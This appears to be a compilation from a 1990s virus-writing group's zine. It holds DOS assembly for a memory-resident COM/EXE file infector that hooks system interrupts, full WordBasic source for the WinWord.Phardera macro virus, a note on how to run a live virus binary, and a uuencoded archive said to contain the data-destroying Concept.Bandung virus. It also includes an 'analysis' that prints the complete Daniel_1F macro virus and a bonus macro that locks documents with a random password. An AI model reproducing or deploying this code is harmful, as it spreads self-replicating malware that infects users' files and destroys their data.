mov ax,offset nof
cwd
add ax,[di+(orgsize-newdta.sizef)]
adc dx,[di+2+(orgsize-newdta.sizef)]
cmp [di+2],dx
jb nchj
jne rechk
cmp [di],ax
jae rechk
nchj: mov sp,offset s.spop24
ncha: call seterr2413E
mov al,[newdta.attrf]
cbw
xchg cx,ax
setfattr:
mov ax,4301h
fileacc:
lds dx,4 ptr ss:[s.namepoi]
filecca proc near
call nrg21werr
push cs
pop ds
@@0:
ret
fileclose_: ;OK
call scanhdlcl80
lodsw
lodsw
lodsw
call movetonew
lea di,[si-size savehdl]
@@41:
mov cl,size savehdl/2
rep movsw
cmp 1 ptr [di],-1
jne @@41
@@42:
or ah,ah
jne @@0
mov ah,57h
call nrg21al0
mov di,offset newdta.timef
xchg cx,ax
stosw
mov [di],dx
reinfect:
call checkdig
@@000:
jne @@0
restpas:
dec cx
jz restexe
mov di,offset wrtheadasm
appe:
push cx dx
mov si,offset newdta.sizef+(datawr-sizenya)
call toseekaw
pop dx cx
call doswrt
sub cx,ax
je recut
call filecut
jmp short redate
rechk:
stosw
mov [di],dx
pushf
sub ax,offset nof-beghead
sbb dx,cx
mov di,offset beghead+enb
call newsig
jbe nchj
mov dx,offset cknt
dec cx
call doswrt
popf
je redate
dec cx
jmp short @@5__1
recut:
call doswrt
call seek0
call di
redate:
les cx,4 ptr [newdta.timef]
mov dx,es
mov ax,5701h
jmp nrg21bx
@@3:
cmp ax,-2000h
ja @@000
mov 1 ptr [di],0E9h
inc di
sub ax,cx
@@4:
stosw
pop si
call decrheader
mov cx,offset nof
mov dx,enb
@@5__1:
mov di,offset wrthead
jmp short appe
restexe:
mov di,offset orgsize+enb
mov si,offset newdta.sizef
lodsw
stosw
mov dx,[si]
cmp dx,6
ja @@000
movsw
mov si,di
push si
call movetonew
mov di,si
call getheadtype
jne @@3
push ax dx
add ax,offset nof
adc dl,ch
div 2 ptr [d200h]
or dx,dx
je @@2
inc ax
@@2:
xchg dx,ax
scasw
stosw ;img1
xchg dx,ax
stosw ;img2
scasw ;count
scasw ;headsize
mov ax,(((enb*4)+(offset nof-start))/16)+40h
stosw ;minmem
scasw ;maxmem
pop dx ax
mov cl,10h
div cx
sub ax,[di-6] ;headsize
mov [di+6],dx ;ip_rec
mov [di+8],ax ;cs_rec
inc ax
stosw ;ss_rec
xchg dx,ax
and al,0FEh
mov ah,high enb
; stosw ;sp_rec
jmp short @@4
endp
readhead2 proc near
pop di
mov dx,offset orghdr+enb
mov cl,size headerexe
call @@03
push di
@@01:
jmp getheadtype
checkdig:
mov al,2
call seekcxdx0
mov 2 ptr [newdta.sizef],ax
mov 2 ptr [newdta.sizef+2],dx
call seek0
cmp 1 ptr [newhdr+enb],0D1h
jne @@39
call @@02
mov ah,dh
mov al,1 ptr [newhdr+enb+1]
xchg si,ax
jmp short cmpsig
readend:
cmp 1 ptr [si],0D1h
jne @@01
call toseekaw
@@02:
mov dx,enb-200h
mov cx,100h
@@03:
mov [fhandle],bx
mov si,dx
@@34:
mov ah,3Fh
call nrg21werr
cmp ax,cx
je @@06
pop ax
@@04:
mov cl,0 ; belum & jangan diinfeksi
jmp short @@05
@@39:
call readhead2 ;ch=0
cwd
les di,[newdta.sizef]
mov bp,es
jne @@42
cmp 1 ptr [si.maxmem+1],6
jb @@04
mov cl,10h
cmp [si.ip_rec],cx
jae @@38
mov ax,[si.headsize]
add ax,[si.cs_rec]
mul cx
mov cx,[si.ip_rec]
@@40:
add ax,cx
adc dx,0
sub di,ax
sbb bp,dx
jc @@04
jne @@41
cmp di,0FA0h
jb @@38
@@41:
mov di,offset beghead
add ax,di
adc dx,0
newsig:
push di
xchg dx,ax
call seekawalcxax
pop dx
mov cx,offset endhead-beghead
call @@34
mov si,offset beghead
cmpsig:
mov di,offset beghead+enb
cmpsw
jne @@38
mov cl,2 ; sudah terinfeksi / test
@@05:
cmp cl,1
@@06: push cs
a@ret:
pop es
ret
getdev:
mov ah,44h
cwd
call nrg21al0
jc @@04
or dl,dl
js @@04
@@38:
mov cl,1 ; belum terinfeksi / jangan test
jmp short @@05
@@42:
or bp,bp
jne @@04
cmp di,24
@@04?:
jbe @@04
lodsb
cmp al,0EBh ; for device w/ com style
jne @@43
cmp 2 ptr [si+1],-1
je @@04?
@@43:
cmp al,0E9h
jne @@38
lodsw
jmp short @@40
endp
scanhdlFF proc near
mov cx,80FFh
@@0:
cmp bx,7Fh
ja a@ret
or ch,bl
mov si,offset temphdl-size savehdl
@@1:
add si,size savehdl
cmp si,offset temphdl+(bufhdl-1)
ja a@ret
cmp cl,[si]
je @@2
cmp ch,[si]
je @@2
cmp bl,[si]
jne @@1
@@2:
ret
scanhdlcl80:
mov ch,80h
scanhdlcl:
mov bx,[bp.xbx]
mov [fhandle],bx
mov cl,bl
jmp short @@0
endp
getfilepos2:
inc si
getfilepos:
mov al,1
call seekcxdx0
pop di
push ax dx di
mov di,offset ncfo
jmp short setmpd
openfile1:
xor al,al
mov di,offset nchl
openfile:
mov 2 ptr [newhdr+enb],dx
mov ah,3Dh
call fileacc
xchg bx,ax
setmpd:
mov [mpd-2],di
ret
int24:
mov sp,offset s.xdta
pop dx ds
mov ah,1Ah
call nrg21
eint24 proc near
push ss
pop ds es si
std
lodsw
@@0:
pop di
movsw
or di,di
movsw
jnz @@0
pop di
push cs
pop es
cld
pushf
mov si,offset bohd+enb
cli
@@3:
if ((offset @@3-bohd)+1) and 1
display "reloc"
cli
endif
mov cx,(offset @@1-bohd)/2
@@1:
rep movsw
eohd:
movsw
call popreg
pop bp
mov ss,cs:[sspoi]
mov sp,cs:[sppoi]
sti
mk90 db 2Eh
jmp 4 ptr [orghdr.ip_rec]
endp
ifdef is_fun
pp3Dh=3Dh
pp6Ch=6Ch
pp3Ch=3Ch
pp034Bh=034Bh
pp014Bh=014Bh
pp004Bh=9090h
pp3Eh=3Eh
pp0242h=0242h
pp3Fh=3Fh
pp4Eh=4Eh
pp4Fh=4Fh
pp40h=40h
else
pp3Dh=3Dh
pp6Ch=6Ch
pp3Ch=3Ch
pp034Bh=034Bh
pp014Bh=014Bh
pp004Bh=004Bh
pp3Eh=3Eh
pp0242h=0242h
pp3Fh=3Fh
pp4Eh=4Eh
pp4Fh=4Fh
pp40h=40h
endif
apasa proc near
new21:
sti
pushf
push ax
xchg al,ah
push cx
xor cx,cx
cmp al,pp3Dh ;0 1 2
je @@04
cp6Ch: cmp al,pp6Ch
jne @@01
inc ch
test dl,10b
je @@04
mov al,3Ch
mov bl,2
@@01:
cmp ax,pp034Bh ;1 1 2
je @@03
inc cx
cmp ax,pp014Bh ;2 1 2
je @@03
inc cx
cmp ax,pp004Bh ;3 1
je @@03
inc cx
cp3Eh: cmp al,pp3Eh ;4 1
je @@02
inc cx
cmp ax,pp0242h ;5 1
jne @@08
@@02:
pk02:
cmp bx,7Eh
ja @@09
cmp 1 ptr cs:[temphdl],-2
ja @@09
@@03:
inc cx
@@04:
pk04:
pop ax
xchg cx,ax
mov cs:[kode21],ax
cmp al,cpfcbfind ;14
je @@06
cmp al,cpfilecreate ;0 1 2 3 4 5
jb @@05
cmp al,cpwritenop
jb @@06 ;6 7 8 9
jne @@05 ;11 12 13
cmp bx,4 ;10
jbe @@10
@@05:
pop ax
call oper21
push ax
MAKE mov,ax,kode21,<0FF00h+cpfilechk>
cmp al,cpfilerun01
ja @@10
add 1 ptr cs:[kode21],cpfileopen2
@@06:
pop ax
popf
pop cs:[toret21]
pop cs:[toret21+2]
clc
push cs
call cl21
jc @@07
pushf
call oper21
popf
@@07: db 0EAh
toret21 dw ?,?
@@08:
inc cx
cp3Ch: cmp al,pp3Ch ;6 2
je @@03
inc cx
cmp al,pp3Fh ;7 2
je @@02
inc cx ;8 2
cmp al,pp4Eh
je @@03
inc cx ;9 2
cmp al,pp4Fh
je @@03
mov cl,cpwritenop
; inc cx ;10 1
; inc cx ;11 1
cmp al,pp40h
je @@02
pk05:
mov cx,200h+cpfcbfind
add al,-12h ;14 2
je @@04
; cmp al,11h ;14 2
inc al
je @@04
cmp al,17h-11h ;12 1
je @@03
inc cx
cmp al,56h-11h ;13 1
je @@03
@@09: pop cx
@@10: pop ax
popf
cl21:
db 0EAh
ex21 dw ?,?,?
db 'PDV',5
endp
sculp2148:
mov ah,48h
sculp21:
pushf
push cs
call cl21
ret
sting:
movsw
pop bp
push si
push bp
zting:
movsw
yting:
mov [si-4],bx
mov [si-2],es
ret
ifdef to10
tc2:
add si,(('W'-'S')*8)-1
add di,16
tc:
mov ax,0A000h
mov es,ax
mov cx,8
lodsb
mov dh,al
@@c3:
mov dl,4
sub bl,dl
@@c2:
mov al,bl
mov ah,al
or dh,dh
js @@c1
xor ax,ax
@@c1:
stosw
stosw
inc bx
add di,320-4
dec dl
jne @@c2
sub di,(320*4)-4
shl dh,1
loop @@c3
ret
ta:
lea si,[bp+('S'*8)]
mov bl,32
@@a1:
add bl,4
call tc
push si
call tc2
pop si
add di,(320*4)-80
cmp bl,64
jb @@a1
mov cx,(320*30)-2
@@a2:
dec di
loop @@a2
cmp di,(320*78)
jb ta
@@a3:
dec di
loop @@a3
tret4:
call popreg
pop bp
jmp short tret5
new10:
sti
or ah,ah
jne @@5
pushf
push cs
call @@5
push bp
call pushreg
pushf
mov ah,0Fh
call @@6
cmp al,13h
jne tret4
mov dx,enb-200h
mov di,dx
mov ax,16
mov cx,32
cld
@@1:
stosw
stosb
inc ax
cmp al,40
ja @@2
inc ax
inc ax
@@2:
loop @@1
mov cl,32
mov bx,cx
mov ax,1012h
call @@6
mov ax,1130h
mov bh,3
call @@6
push es
pop ds
mov di,(320*60)+(160-64)
jmp short ta
@@6:
pop di
pushf
push cs
push di
@@5:
db 0EAh
ex10 dd ?
endif
pushreg:
pop bp
push di si cx ds dx es bx ax bp cs cs
pop ds es
ret
popreg:
pop bp
popf
pop ax bx es dx ds cx si di
push bp
ret
oper21:
mov cs:[sppoi],sp
mov cs:[sspoi],ss
back21:
push cs
cli
pop ss
mov sp,offset s.xbp+2
push bp
call pushreg
cld
ifdef is_fin
mov si,offset bohd
jmp bohd
else
ifdef tan4
mov di,offset fohd
else
mov sp,offset fohd
endif
mov si,offset eohd
endif
olk1:
mov bx,offset dohd-offset olk1
olk2:
dec bx
jl olk1
dec si
dec si
mov ax,2 ptr [bx+olk1]
ifdef tan4
add ax,di
else
add ax,sp
endif
xor al,[ccnt]
xor [si],ax
MAKE cmp,si,fohd,<offset bohd>
jne olk2
ifdef tan4
push si
endif
dohd:
ret
prit proc near
mov ah,0Fh
int 10h
push ax
mov ah,3
call int10
pop ax
push dx
mov bl,7Fh
mov bp,offset textmode
cmp al,7
je @@4
mov bl,40h
ja @@3
cmp al,4
jb @@4
mov bl,20h
@@3:
mov bp,offset grapmode
@@4:
mov dl,ah
sub dl,24
shr dl,1
mov dh,6
mov di,enb-100h
push di
lodsb
@@1: cbw
xchg cx,ax
lodsb
db 0F3h
@@2:
stosb
lodsb
cmp al,31
jb @@1
ja @@2
a0:
pop si
a1:
mov cl,24
a2:
push bx cx dx
call int1002
call bp
pop dx cx bx
inc dx
loop a2
add dx,100h-24
cmp dh,9
jne a3
mov bl,70h
a3:
cmp dh,12
jb a1
pop dx
int1002:
mov ah,2
jmp short int10
grapmode:
push bx
mov cl,4
shr bl,cl
mov al,'€'
call int1009
pop ax
and al,0Fh
or al,80h
xor bl,al
textmode:
lodsb
int1009:
mov cl,1
mov ah,9
int10:
push si bx bp
int 10h
pop bp bx si
ret
prit endp
amndat db 2
db 003h,020h,'I HATE SAYHA WATPU'
db 008h,020h,002h,0DCh,002h,020h,0DCh,003h,020h,0DCh,020h,0DCh,002h,020h
db 0DCh,009h,020h,0DFh,0DCh,020h,0DFh,059h,053h,054h,045h,043h,048h,020h,0DBh,002h
db 0DCh,0DBh,041h,052h,044h,006h,020h,0DCh,020h,0DFh,0DCh,020h,0DBh,020h,0DCh,020h
db 0DBh,049h,04Eh,044h,049h,045h,00Ah,020h,002h,0DFh,003h,020h,0DFh,020h,0DFh,002h
db 020h,0DFh,002h,020h,0DFh,01Dh,020h,01Fh
ifdef inap13
nap13 proc near
sti
cmp ah,3
je @@3
cmp ah,5
jne @@2
@@3:
push bp
mov bp,sp
push ax
mov ax,es
cmp ax,[bp+4]
stc
jne @@1
MAKE cmp,ax,vseg
jb @@1
cmp ax,0A000h
cmc
@@1:
pop ax bp
toendi: jae tret5
@@2:
jmp 4 ptr cs:[ex13]
endp
endif
new160 proc near
@@1:
pushf
push cs
call @@3
push bp
call pushreg
pushf
cmp ax,3B00h
jne @@2
mov si,offset amndat
dec 1 ptr [si]
jne @@2
mov 1 ptr [si],2
inc si
cld
call prit
@@2:
tret4:
call popreg
pop bp
jmp short tret5
nocrep:
popf
mov al,5
tret5:
cmp ah,1
cmc
retf 2
new16:
sti
test ah,11101111b
je @@1
@@3: db 0EAh
ex16 label word
endp
fwrbuf equ 1 ptr ex16+4
nextdata equ 1 ptr fwrbuf+size headerexe+2
tdta1 equ 1 ptr nextdata+size dummy_data
tdta2 equ 1 ptr tdta1+size tempdta2
pknew1 proc far
local pcx:word:9,pes,pds,pss,pax
@@4:
mov [di],si
scasw
mov [di],ax
scasw
mov [xpo],di
MAKE mov,<2 ptr [di]>,xal_0
scasw
MAKE mov,<2 ptr [di]>,xal_2
jmp short @@5
new1:
push bp
mov bp,sp
push bp bp
push 2 ptr [bp+di]
push bp bp
push 2 ptr [bp+di]
push cx di si es ds ss ax
; 14 16 18 20 22 24 26
cld
mov ax,cs
cmp ax,[bp+4]
je trap09
or cx,bx
jne @@1
or si,di
@@1: les si,[bp+2]
mov cl,3
jne @@6
mov di,-26
MAKE cmp,<2 ptr [bp+di]>,irc
jne @@6
MAKE cmp,dx,exdl,80h
jne @@6
@@1?:
scasw
cmp [bp+di],ax
jne @@6
loop @@1?
MAKE mov,cx,arc
@@2: push cs
pop ds
mov ax,es
cmp ax,cx
je @@5
mov di,offset eof.xle-8
@@3:
add di,8 ;0 8 16
cmp di,[xpo] ;0 4 12
jae @@4
jcxz @@3
cmp ax,[di+2]
jne @@3
MAKE mov,cx,xi,1
mov 1 ptr [xi],1
jcxz @@3
@@5:
call m_xal_arc
xor cx,cx
@@6:
and 1 ptr [bp+9],-1
@@9:
SEGES
lodsb
cmp al,9Dh ; POPF
jne @@7
or 1 ptr [bp+9],1
@@7:
cmp al,0CFh ; IRET
jne @@8
or 1 ptr [bp+13],1
@@8:
cmp al,0CDh
jne @@C
jcxz @@B
@@C:
cmp al,9Ch ; PUSHF
mov al,-1
jne @@A
dec ax
@@A:
mov 1 ptr cs:[@@9-1],al
trap09:
pop ax si ds es si di cx
mov sp,bp
pop bp
new8:
cli
push bp
mov bp,sp
and 1 ptr [bp+7],11111110b
tj08: ;pxx
or 1 ptr [bp+7],0
pop bp
push ax
mov al,20h
out 20h,al
pop ax
iret
@@B:
mov 1 ptr [xi],cl
push es
pop ds
call gintnum
mov [bp+2],ax
mov ax,[bp+6]
sub bp,6
mov [bp+6],ax
les si,[si]
mov [bp+2],si
mov [bp+4],es
jmp @@2
endp
m_xal_arc:
mov [xal_0],si
mov [xal_2],ax
mov [arc],ax
ret
trace16:
mov ch,2
mov si,(16h*4)
trace13: ;ch=08
push ss
pop es
trace21: ;ch=33
mov ax,80h
trace40 proc near ;ch=08
push ss
pop ds
mov [exdl],ax
cwd
xchg dx,ax
mov [eof.xle],si
call m_xal_arc
mov ds,ax
mov di,offset eof.intn
movsw
movsw
cli
mov si,4
mov bx,offset new1
call sting
mov si,20h
if high(offset new8-start) EQ high(offset new1-start)
mov bl,low(offset new8)
else
.radix 16
mpi new08, <%offset new2>
mpi new01, <%offset new8>
.radix 10
mov bx,offset new8
endif
call sting
sti
push di cs
pop ds
stosw
mov 2 ptr [xpo],di ;0
scasw
stosw
mov di,ax
mov si,ax
xchg cx,ax
mov [irc],ax
pushf
inc 1 ptr [bx+((tj08+3)-new8)]
int 1
xor bx,bx
call 4 ptr [eof.intn]
pop si
std
lodsw
mov 1 ptr [tj08+3],al
push ax
pop es di
cli
movsw
movsw
pop di
movsw
movsw
sti
cld
push cs
pop es
MAKE mov,bx,xpo
@@0:
lds si,cs:[bx]
sub bx,8
mov cx,ds
jcxz @@1
lodsb
cmp al,0CDh
jne @@4
gintnum:
xor ax,ax
push ax
lodsb
shl ax,1
shl ax,1
pop ds
xchg si,ax
@@1:
ret
@@4:
cmp al,0EAh
je @@3
cmp al,2Eh
jne @@0
lodsw
mov si,[si]
cmp ax,2EFFh
je @@3
cmp ax,1EFFh
jne @@0
@@3:
mov ax,[si+2]
cmp ax,cs:[bx+6]
jne @@0
ret
endp
rung:
mov sp,enb-2
push cs
pop ss
ifdef is_fin
int 3
endif
push cx cx cx cx ss cx ax cx bx cs
pop ds
mov si,offset newhdr
mov cl,size headerexe
@@00:
dec si
not 1 ptr [si]
loop @@00
cmp 1 ptr [si+size headerexe],cl
jns @@01
mov di,100h
mov [si.cs_rec],ax
mov [si.ip_rec],di
movsw
movsb
jmp short @@02
@@01:
add ax,10h
add [si.cs_rec],ax
add ax,[si.ss_rec]
mov dx,[si.sp_rec]
@@02:
mov si,offset cknt
mov [si-(offset cknt-sspoi)],ax
mov [si-(offset cknt-sppoi)],dx
inc 2 ptr [si]
lodsw
cmp al,2
pushf
@@12:
xchg [si-(bohd-ccnt)],al
xor al,[si-(bohd-cknt)]
mov cx,(offset eohd-bohd) /2
if (offset eohd-bohd) and 1
display "EOHD cooy"
.err
endif
@@13:
ifndef is_fin
xor 1 ptr [si],al
endif
cmpsw
loop @@13
xchg cx,ax
mov ch,08h
mov si,4Ch
push es cx
call trace13
mov di,offset of13
mov ax,si
stosw
mov ax,ds
stosw
movsw
movsw
xor ax,ax
mov ds,ax
mov si,100h
pop cx
or dh,dh
je @@3
call trace40
@@3:
mov di,offset ex40
movsw
movsw
mov ch,33h
mov si,84h
call trace21
pop bp
mov di,offset ex21
movsw
lodsw
stosw
push si ds
xor ax,0D1A5h
mov es:[di],ax
jcxz @@04
mov cx,5
rep cmpsb
jne @@04
cmpsb
jae @@07_1
@@04:
mov ax,1022h
xor bx,bx
int 15h
or bx,bx
jne @@07_1
mov ds,bx
cmp ds:[0BEh],bx
je @@05?
mov ax,4000h
int 2Fh
test al,7Fh
jnz @@07_1
mov ax,1700h
int 2Fh
test al,7Fh
jz @@05?
@@07_1:
jmp @@07
@@05?:
push cs
pop ds
ifdef inap13
int 12h
mov cl,6
shl ax,cl
mov 2 ptr [vseg],ax
endif
mov dx,5A4Dh
xor di,di
cmp 2 ptr [di+(orghdr-start)],dx
pushf
jne @@05A
mov bh,-1
call sculp2148
cmp bh,4
jb @@05A
call sculp2148
xchg bp,ax
mov es,bp
mov ah,49h
call sculp21
@@05A:
mov cx,bp
dec bp
popf
push bp
mov bp,((offset pkl-start)+15+enb) /16
je @@6
mov ax,cx
call relocation
inc bp
add ax,bp
mov [orghdr.cs_rec],ax
mov [sspoi],ax
mov ds:[enb-16],ax
mov si,[di+(orgsize-start)]
pop ds
sub [di+3],bp
mov ds:[46h],ax
mov cx,[di+3Ch]
inc di
mov [di],ax
jcxz @@9
dec cx
mov es,cx
stosw
@@9:
xchg bx,ax
mov ah,50h
call sculp21
dec bx
mov es,bx
add si,110h
mov cx,si
dec si
mov di,si
std
rep movsb
cld
inc di
dec bp
mov [di+3],bp
mov [di],dl
mov bp,((offset pkl-start)+31+enb) /16
jmp short @@8
@@6:
pop ds
xchg dl,[di]
add cx,[di+3]
mov bx,cx
sub cx,bp
call relocation
inc bp
sub [di+12h],bp
@@8:
sub bx,bp
mov es,bx
mov ax,084Dh
stosw
xor ax,ax
mov si,ax
stosb
sub [di],bp
mov al,((offset p00-start) / 16)
stosw
inc bx
mov es,bx
add bx,ax
mov di,si
mov cx,enb/2
rep movs 2 ptr es:[di],ss:[si]
mov 1 ptr es:[mk90],0C3h
mov al,-1
mov di,offset temphdl
tuno=5
if bufhdl LE 0FEh
mov cl,(offset p00-tuno)-offset temphdl;bufhdl+1
else
mov cx,(offset p00-tuno)-offset temphdl;bufhdl+1
endif
rep stosb
xchg dx,ax
stosb
xchg bx,ax
mov es:[di+3Ch-1],ax
inc ax
stosw ;segm
lea ax,[bp-(((offset p00-start) / 16)+2)]
stosw
pop ds si
mov bx,offset new21
ifdef is_fan
mov bx,offset new21
else
call yting
endif
; lds si,4 ptr ss:[of13]
; mov 2 ptr [si],offset nap13
; mov [si+2],es
popf
jb @@11
push es
call trace16
pop es
mov di,offset ex16
mov bx,offset new16
call sting
@@11:
mov bp,offset temp
push ss
call moves
@@07:
mov sp,enb-20
pushf
call popreg
pop bp
push es
pop ds
jmp back21
jkl:
if ((offset jkl-start) mod 16) NE tuno
db ((16+tuno)-((offset jkl-start) mod 16)) mod 16 dup (?)
endif
p00 dw 0
psw db 'SWDIEHARD'
pkl:
if (offset pkl-start) LT 4000
db 4000 - (offset pkl-start) dup ('x')
elseif (offset pkl-start) NE 4000
.radix 16
abc=(offset jkl-start)-0F95h
mpi pkl_,%abc
.radix 10
.err
endif
org 4000
nof label dword
tempint equ 2 ptr pkl+12
go13 equ 4 ptr tempint+10h
of13 equ 4 ptr tempint+14h
ex13 equ 4 ptr tempint+18h
ex40 equ 4 ptr tempint+1Ch
eof equ 2 ptr pkl+2Eh
temphdl equ 1 ptr (p00-(tuno+2))-bufhdl
s equ temphdl-size smystack
apjt equ '3146091-4'
if high(offset new13-start) NE high(offset new40-start)
.err
endif
;if high(offset new8-start) NE high(offset new1-start)
;%OUT NEW8
;.err
;endif
end qu
...
'----------------- FileOpen macro ---------------------------
'* WinWord.Phardera (with encrypt and stealth)
'* Virographer by Phardera [VBB]
'* Last Update: July 10, 96.
'* Dedicated to Dianita DSR and All VBBers
'* This virus was written in the city of Batavia, Indonesia.
'If you found 'bugs' please contact me!
Dim Shared Macros$(2)
Dim Shared TotalMacros
Sub Main
On Error Goto Esc
DisableAutoMacros 1
InfectGlobal(FileName$())
Dim DlgFO As FileOpen
GetCurValues DlgFO
Dialog DlgFO
FileOpen DlgFO
InfectDoc(DlgFO.Name)
FuckIt
Goto DoneFO
Esc:
If Err <> 102 Then
FileOpen DlgFO
End If
DoneFO:
Let Err = 0
End Sub
Sub InfectGlobal(DocName$)
On Error Goto Done1
SetMacros
Let Already = 0
For i = 1 To CountMacros(0, 0)
For j = 1 To TotalMacros
If MacroName$(i, 0, 0) = Macros$(j) Then
Let Already = - 1
End If
Next j
Next i
If Not Already Then
ToolsOptionsSave .GlobalDotPrompt = 0
ToolsOptionsGeneral .RecentFiles = 0
MacroCopy DocName$ + ":FileOpen", "Global:FileOpen", 1
ToolsCustomizeMenus .Name = "ToolsMacro", .Menu = "Tools", .Remove
ToolsCustomizeMenus .Name = "ToolsCustomize", .Menu = "Tools", .Remove
ToolsCustomizeMenus .Name = "FileTemplates", .Menu = "File", .Remove
End If
Done1:
Let Err = 0
End Sub
Sub InfectDoc(DocName$)
On Error Goto Done2
Dim Dlg As FileSaveAs
GetCurValues Dlg
If Dlg.Format = 0 Then Let Dlg.Format = 1
If Dlg.Format = 1 Then
SetMacros
Let Already = 0
For i = 1 To CountMacros(1, 0)
For j = 1 To TotalMacros
If MacroName$(i, 1, 0) = Macros$(j) Then
Let Already = - 1
End If
Next j
Next i
If Not Already Then
MacroCopy "Global:FileOpen", DocName$ + ":FileOpen", 1
FileSaveAs Dlg
End If
End If
Done2:
Let Err = 0
End Sub
Sub SetMacros
Let TotalMacros = 4
Let Macros$(1) = "FileOpen"
Let Macros$(2) = "ToolsCustomizeMenus"
Let Macros$(3) = "ToolsOptionsSave"
Let Macros$(4) = "ToolsOptionsGeneral"
End Sub
Sub FuckIt
If Day(Now()) = 14 Then
MsgBox "Dianita DSR. [I Love Her!]", "Phardera [VBB]", 64
ElseIf Day(Now()) = 31 Then
MsgBox "Phardera was here!", "Phardera [VBB]", 16
End If
End Sub
Rickdoggs Lord Natas v666!
This is anew virus written by one of our newest members Rickdogg. We haven't had time to evaluate the payload of this virus yet (he wouldn't tell us what it was).
But, for now I have put the virus into this zip as Rickdogg.exv. To execute rename it to rickdogg.exe. Enjoy....
-Dark Night
Concept.Bandung
A new dangerous macro virus from Bandung, Indonesia.
Published by Phardera [VBB]
I found this virus in Bandung City (Paris van Java).
I believe this virus modification from Concept.
It is not encrypted virus but will destroy data in drive C:
It contains the macros:
- AutoOpen
- AutoExec
- FileSaveAs
- FileSaveAs
- ToolsCustomize
- ToolsMacro
---------------------------------------------------------------
begin 644 bandung.zip
M4$L#!!0````(`,V(J2"T;.+8K"0```"X```+````0D%.1%5.1RY$3U3L6WV,
M&\=U'_+(^Y#N;.DL698<.Z-(EG4*1>E.)\F2ZU24[B2==!\425G^4&L,;U?D
...
M4=YL_W\LF!Z)%+-@>F]2%DS;O\$63/\#4$L!`A0`%`````@`S8BI(+1LXMBL
M)````+@```L``````````0`@`````````$)!3D153D<N1$]44$L%!@`````!
-``$`.0```-4D````````
`
end
---------------------------------------------------------------
Analysis of the macro virus
--------------------------------------------------------------
Analysis of the macro virus
Daniel_1F - Beta International Version
,
By <****{=============-
' AuRoDrEpH, the Drow
--------------------------------------------------------------
The other day, Dark Night send me an infected file. When you open it, with Word, some phrases tell you that:
"This text file contains the Word_Macro_Virus_Daniel_1F virus.
Now your system is infected. Have a nice day! "
True, the virus is in your NORMAL.DOT...but when you want to look the macro, you are very surprised because the option "Macros" in the FILE and OPTIONS Menu disappear. Interesting !!!
The virus is formed with 2 macros :
- AutoOpen (name in a file) or Word6Menu (name in NORMAL.DOT)
- MacroManager
Special gift : I put in the last part of the document a little macro that i wrote :-))
Now the source :
----------------------------------------------------------
Macro AutoOpen
PURPOSE: To infected the system and modify some menu to avoid dectection ?
Sub MAIN
REM You've reached! Here is the virus. Enjoy.
REM This is the Word_Macro_Virus_Daniel_1F - Beta International Version.
REM Please Support the Virus Concept. Have a nice Day! (BR/US)
On Error Resume Next
*- when opening the file, direct infection of the
NORMAL.DOT
MacroCopy FileName$(0) + ":AutoOpen", "Global:Word6Menu", 1
MacroCopy FileName$(0) + ":MacroManager", "Global:MacroManager", 1
*- modified a name of the WORD menu
T$ = MenuText$(0, 1)
H$ = MenuItemText$(T$, 0, 5)
M$ = "&Save"
*- adapte the text for the portugese version of Word
If H$ = "ArquivoSalvar" Or H$ = "&Salvar" Then M$ = "&Salvar"
*- delete the old menu "SAVE" and add the new one
(correspond to the second macro)
ToolsCustomizeMenus .Position = 5, .Menu = T$,
.Name = MenuItemMacro$(T$, 0, 5), .MenuText = H$, .Context = 0,
.Remove
ToolsCustomizeMenus .Position = 5, .Category = 2,
.Name = "MacroManager", .Menu = T$, .MenuText = M$, .Context = 0,
.Add
ToolsCustomizeKeyboard .KeyCode = 339, .Category = 2, .Name = "MacroManager",
.Add, .Context = 0
ToolsCustomizeKeyboard .KeyCode = 322, .Category = 2, .Name = "MacroManager",
.Add, .Context = 0
*- to avoid detection, classic now ;-)
ToolsOptionsSave .GlobalDotPrompt = 0
DisableAutoMacros 0
*- Now, it deletes the OPTION/MACRO menu
T$ = TexteMenu$(0, 6)
M$ = "&Macro..."
G = 0
For n = 1 To CountMenuItems(T$, 0, 0)
Y$ = MenuItemText$(T$, 0, n, 0)
If Y$ = M$ Or Left$(Y$, 4) = "Macr" Or Left$(Y$, 4) = "&Mac"
Then G = n
Next n
If G <> 0 Then H$ = MenuItemText$(T$, 0, G, 0)
If G <> 0 Then
ToolsCustomizeMenus .Position = G, .Menu = T$,
.Name = MenuItemMacro$(T$, 0, G, 0), .MenuText = H$,
.Context = 0, .Remove
End if
T$ = MenuText$(1, 1)
M$ = "&Macro..."
G = 0
For n = 1 To CountMenuItems(T$, 1, 0)
Y$ = MenuItemText$(T$, 1, n, 0)
If Y$ = M$ Or Left$(Y$, 4) = "Macr" Or Left$(Y$, 4) = "&Mac" Then
G = n
Next n
If G <> 0 Then H$ = MenuItemText$(T$, 1, G, 0)
If G <> 0 Then
ToolsCustomizeMenus .MenuType = 1, .Position = G, .Menu = T$,
.Name = MenuItemMacro$(T$, 1, G, 0), .MenuText = H$,
.Context = 0, .Remove
On Error Goto 0
End Sub
---------------------------------------------------
Macro MacroManager
PURPOSE: To infected each file when you save it.
Sub MAIN
On Error Goto CX
*- protection for the autoexecute macro
DisableAutoMacros 0
*- to avoid the confirmation when the virus
infected the NORMAL.DOT
ToolsOptionsSave .GlobalDotPrompt = 0
N$ = UCase$(Right$(FileName$(0), 3))
If N$ <> "DOC" And N$ <> "DOT" Then Goto CX
E = CountMacros(1)
X = 0
*- the virus searchs if the system is still infected
For i = 1 To E
If MacroName$(i, 1) = "MacroManager" Then X = 1
If MacroName$(i, 1) = "AutoOpen" Then X = 1
Next i
If X = 1 Then Goto CX *- it's infected , exit
*- else it infected the system
FileSaveAs .Name = FileName$(0), .Format = 1, .AddToMru = 1, .EmbedFonts = 1
*- modifie the name of a macro
MacroCopy "Global:Word6Menu", FileName$(0) + ":AutoOpen", 1
MacroCopy "Global:MacroManager", FileName$(0) + ":MacroManager", 1
CX:
*- information of the creator of the virus
FileSummaryInfo .Keywords = "Daniel_Stone",
.Comments = "All information should be free."
FileSave *- save all the modifications
On Error Goto 0
End Sub
---------------------------------------
SPECIAL BONUS :
I made a little interesting macro... i name it RANDOM...
try it but analyse it before :-) I'm not responsable of the use...
Sub MAIN
On Error Goto err
passwd$ = ""
a = 10
b = 20
nbr = Int(Rnd() * (b - a) + a)
For i = 1 To nbr
a = 65
b = 90
char = Int(Rnd() * (b - a) + a)
passwd$ = passwd$ + Chr$(char)
Next
ToolsOptionsSave .Passwd = passwd$
goto bye
err:
bye:
EndSub
HDEuthanasia
- ALIAS: HDEuthanasia
